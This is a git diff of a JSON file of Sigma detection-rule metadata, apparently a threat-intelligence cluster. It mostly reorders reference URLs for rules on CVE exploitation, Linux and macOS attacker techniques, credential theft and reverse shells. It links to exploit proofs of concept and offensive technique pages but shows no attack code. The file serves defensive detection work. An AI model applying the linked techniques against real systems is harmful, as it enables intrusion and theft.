+ "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
+ "https://news.ycombinator.com/item?id=29504755",
+ "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml"
 ],
 "tags": [
@@ -77930,9 +77954,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.tenable.com/security/research/tra-2021-13",
- "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild",
 "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2",
+ "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild",
+ "https://www.tenable.com/security/research/tra-2021-13",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml"
 ],
 "tags": [
@@ -77967,8 +77991,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/",
 "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
+ "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml"
 ],
 "tags": [
@@ -78069,12 +78093,12 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://nvd.nist.gov/vuln/detail/CVE-2021-41773",
 "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782",
- "https://twitter.com/h4x0r_dz/status/1445401960371429381",
 "https://twitter.com/bl4sty/status/1445462677824761878",
- "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml",
+ "https://twitter.com/h4x0r_dz/status/1445401960371429381",
 "https://twitter.com/ptswarm/status/1445376079548624899",
+ "https://nvd.nist.gov/vuln/detail/CVE-2021-41773",
+ "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml"
 ],
 "tags": [
@@ -78107,9 +78131,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md",
 "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/",
 "https://www.exploit-db.com/exploits/39161",
+ "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml"
 ],
 "tags": [
@@ -78144,9 +78168,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
+ "https://github.com/lijiejie/IIS_shortname_Scanner",
 "https://www.exploit-db.com/exploits/19525",
 "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml",
- "https://github.com/lijiejie/IIS_shortname_Scanner",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml"
 ],
 "tags": [
@@ -78326,10 +78350,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://support.citrix.com/article/CTX267027",
- "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md",
- "https://support.citrix.com/article/CTX267679",
 "https://isc.sans.edu/diary/25686",
+ "https://support.citrix.com/article/CTX267679",
+ "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md",
+ "https://support.citrix.com/article/CTX267027",
 "https://twitter.com/mpgn_x64/status/1216787131210829826",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml"
 ],
@@ -78440,9 +78464,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/",
- "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html",
 "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
+ "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html",
+ "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml"
 ],
 "tags": [
@@ -78709,8 +78733,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685",
+ "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml"
 ],
 "tags": [
@@ -79316,8 +79340,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md",
 "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml"
 ],
 "tags": [
@@ -79374,9 +79398,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97",
 "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/",
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml"
 ],
 "tags": [
@@ -79489,8 +79513,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "macos",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
 "https://gist.github.com/Capybara/6228955",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"
 ],
 "tags": [
@@ -79548,10 +79572,10 @@
 "logsource.category": "No established category",
 "logsource.product": "qualys",
 "refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
- "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml"
 ],
 "tags": "No established tags"
@@ -79570,9 +79594,9 @@
 "logsource.category": "No established category",
 "logsource.product": "qualys",
 "refs": [
+ "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml"
 ],
 "tags": "No established tags"
@@ -79593,9 +79617,9 @@
 "logsource.category": "No established category",
 "logsource.product": "No established product",
 "refs": [
+ "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml"
 ],
 "tags": "No established tags"
@@ -79616,8 +79640,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/Azure/Azure-Sentinel/pull/3059",
 "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure",
+ "https://github.com/Azure/Azure-Sentinel/pull/3059",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml"
 ],
 "tags": [
@@ -79773,8 +79797,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
 "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
+ "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml"
 ],
 "tags": [
@@ -80008,9 +80032,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md",
 "https://linux.die.net/man/8/insmod",
 "https://man7.org/linux/man-pages/man8/kmod.8.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml"
 ],
 "tags": [
@@ -80069,9 +80093,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
+ "https://github.com/berdav/CVE-2021-4034",
 "https://access.redhat.com/security/cve/CVE-2021-4034",
 "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034",
- "https://github.com/berdav/CVE-2021-4034",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml"
 ],
 "tags": [
@@ -80104,8 +80128,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
 "https://imagemagick.org/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
 "https://linux.die.net/man/1/import",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml"
 ],
@@ -80130,8 +80154,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md",
 "https://firewalld.org/documentation/man-pages/firewall-cmd.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml"
 ],
 "tags": [
@@ -80189,9 +80213,9 @@
 "logsource.product": "linux",
 "refs": [
 "https://mn3m.info/posts/suid-vs-capabilities/",
+ "https://man7.org/linux/man-pages/man8/getcap.8.html",
 "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099",
 "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
- "https://man7.org/linux/man-pages/man8/getcap.8.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml"
 ],
 "tags": [
@@ -80250,8 +80274,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "Self Experience",
 "https://github.com/Neo23x0/auditd/blob/master/audit.rules",
+ "Self Experience",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml"
 ],
 "tags": [
@@ -80275,8 +80299,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml"
 ],
 "tags": [
@@ -80664,8 +80688,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
 "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
+ "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml"
 ],
 "tags": [
@@ -80830,8 +80854,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture",
 "https://linux.die.net/man/1/xwd",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml"
 ],
 "tags": [
@@ -80922,10 +80946,10 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
+ "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu",
+ "https://linux.die.net/man/1/chage",
 "https://man7.org/linux/man-pages/man1/passwd.1.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
- "https://linux.die.net/man/1/chage",
- "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml"
 ],
 "tags": [
@@ -81050,10 +81074,10 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md",
 "https://linux.die.net/man/8/pam_tty_audit",
- "https://access.redhat.com/articles/4409591#audit-record-types-2",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md",
 "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
+ "https://access.redhat.com/articles/4409591#audit-record-types-2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml"
 ],
 "tags": [
@@ -81153,9 +81177,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
+ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files",
 "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
 "https://access.redhat.com/articles/4409591#audit-record-types-2",
- "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml"
 ],
 "tags": [
@@ -81188,9 +81212,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://book.hacktricks.xyz/shells/shells/linux",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan",
 "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
+ "https://book.hacktricks.xyz/shells/shells/linux",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml"
 ],
 "tags": [
@@ -81459,9 +81483,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
 "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid",
 "https://linux.die.net/man/8/useradd",
+ "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml"
 ],
 "tags": [
@@ -81618,9 +81642,9 @@
 "logsource.product": "linux",
 "refs": [
 "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
+ "https://artkond.com/2017/03/23/pivoting-guide/",
 "http://pastebin.com/FtygZ1cg",
 "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html",
- "https://artkond.com/2017/03/23/pivoting-guide/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml"
 ],
 "tags": [
@@ -81653,9 +81677,9 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
+ "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/",
 "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml",
 "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/",
- "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml"
 ],
 "tags": [
@@ -81945,8 +81969,8 @@
 "logsource.category": "No established category",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
 "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c",
+ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml"
 ],
 "tags": [
@@ -82212,8 +82236,8 @@
 "logsource.category": "file_event",
 "logsource.product": "linux",
 "refs": [
- "https://www.makeuseof.com/how-to-install-and-use-doas/",
 "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
+ "https://www.makeuseof.com/how-to-install-and-use-doas/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml"
 ],
 "tags": [
@@ -82246,8 +82270,8 @@
 "logsource.category": "network_connection",
 "logsource.product": "linux",
 "refs": [
- "https://twitter.com/hakluke/status/1587733971814977537/photo/1",
 "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent",
+ "https://twitter.com/hakluke/status/1587733971814977537/photo/1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml"
 ],
 "tags": [
@@ -82506,8 +82530,8 @@
 "logsource.product": "linux",
 "refs": [
 "https://gtfobins.github.io/gtfobins/vim/",
- "https://gtfobins.github.io/gtfobins/vimdiff/",
 "https://gtfobins.github.io/gtfobins/rvim/",
+ "https://gtfobins.github.io/gtfobins/vimdiff/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml"
 ],
 "tags": [
@@ -82802,11 +82826,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
+ "https://curl.se/docs/manpage.html",
+ "https://twitter.com/d1r4c/status/1279042657508081664",
+ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
 "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
- "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
- "https://twitter.com/d1r4c/status/1279042657508081664",
- "https://curl.se/docs/manpage.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml"
 ],
 "tags": [
@@ -82847,8 +82871,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://gtfobins.github.io/gtfobins/apt/",
 "https://gtfobins.github.io/gtfobins/apt-get/",
+ "https://gtfobins.github.io/gtfobins/apt/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml"
 ],
 "tags": [
@@ -82872,10 +82896,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://linuxize.com/post/how-to-delete-group-in-linux/",
- "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
- "https://www.cyberciti.biz/faq/linux-remove-user-command/",
 "https://linux.die.net/man/8/userdel",
+ "https://linuxize.com/post/how-to-delete-group-in-linux/",
+ "https://www.cyberciti.biz/faq/linux-remove-user-command/",
+ "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml"
 ],
 "tags": [
@@ -83136,8 +83160,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
 "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/",
+ "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml"
 ],
 "tags": [
@@ -83262,8 +83286,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/Azure/Azure-Sentinel/pull/3059",
 "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure",
+ "https://github.com/Azure/Azure-Sentinel/pull/3059",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml"
 ],
 "tags": [
@@ -83380,10 +83404,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://linux.die.net/man/8/groupdel",
 "https://linuxize.com/post/how-to-delete-group-in-linux/",
- "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
 "https://www.cyberciti.biz/faq/linux-remove-user-command/",
+ "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
+ "https://linux.die.net/man/8/groupdel",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml"
 ],
 "tags": [
@@ -83416,8 +83440,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html",
 "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
+ "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml"
 ],
 "tags": [
@@ -83450,8 +83474,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/carlospolop/PEASS-ng",
 "https://github.com/diego-treitos/linux-smart-enumeration",
+ "https://github.com/carlospolop/PEASS-ng",
 "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml"
 ],
@@ -83713,8 +83737,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/Azure/Azure-Sentinel/pull/3059",
 "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure",
+ "https://github.com/Azure/Azure-Sentinel/pull/3059",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml"
 ],
 "tags": [
@@ -83765,9 +83789,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://gtfobins.github.io/gtfobins/nohup/",
 "https://en.wikipedia.org/wiki/Nohup",
 "https://www.computerhope.com/unix/unohup.htm",
+ "https://gtfobins.github.io/gtfobins/nohup/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml"
 ],
 "tags": "No established tags"
@@ -84058,8 +84082,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md",
 "https://attack.mitre.org/techniques/T1548/001/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml"
 ],
 "tags": [
@@ -84092,8 +84116,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/apache/spark/pull/36315/files",
 "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
+ "https://github.com/apache/spark/pull/36315/files",
 "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml"
 ],
@@ -84161,8 +84185,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
 "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/",
+ "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml"
 ],
 "tags": [
@@ -84222,5 +84246,5 @@
 "value": "Security Software Discovery - Linux"
 }
 ],
- "version": "20230112"
+ "version": 20230112
 }
From 997e570ad23aad74ddd3ec6517c71b907fa0cdfd Mon Sep 17 00:00:00 2001
